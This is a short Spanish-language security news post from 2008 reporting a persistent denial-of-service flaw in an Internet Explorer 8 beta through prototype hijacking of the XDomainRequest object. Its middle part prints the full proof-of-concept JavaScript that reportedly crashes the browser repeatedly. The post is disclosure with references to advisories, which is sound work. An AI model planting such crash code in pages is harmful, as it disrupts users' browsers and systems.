| Kriptópolis alojado en |
| Zilos-Veloxia Network |
| Tu mejor defensa: |
| Bufet Almeida |
DoS persistente en Explorer 8
Enviado por admin el 30. Marzo 2008 - 17:42.
Internet Explorer 8 es vulnerable al secuestro de prototipos en el objeto XDomainRequest, una nueva característica que permite llamadas XML entre dominios. Se trata de un ataque muy similar al descrito en 2006 por Stefano Di Paola y Giorgio Fedon sobre XMLHttpRequest.
Además, puesto que Explorer 8 intenta crear otra nueva ventana de sesión cuando una ventana se cuelga, se acaba produciendo un cuelgue repetido y persistente que sólo puede detenerse reiniciando el sistema completo...
El vector de ataque utilizado ha sido el siguiente:
<script>
// trying prototype hijacking here.
xdr = XDomainRequest;
xdr = function() {
return new XDomainRequest();
}
ping = 'hello';
xdr = new XDomainRequest();
xdr.open("POST", "http://cnn.com");
xdr.send(ping);
</script>
Referencias:
- Internet Explorer 8 XDR Persistent DOS [The Hacker Webzine].
- Subverting Ajax [Stefano Di Paola y Giorgio Fedon. PDF. Diciembre 2006].
- XDomainRequest Object [MSDN, Microsoft].
- XDomainRequest() y como Microsoft hace lo que le da la gana [anieto2k].
- Access Control for Cross-site Requests [W3C Working Draft 14 February 2008].
- Actualización [3-Abril]: Microsoft Internet Explorer XDR Prototype Hijacking Denial of Service Vulnerability [Security Focus].
Opinar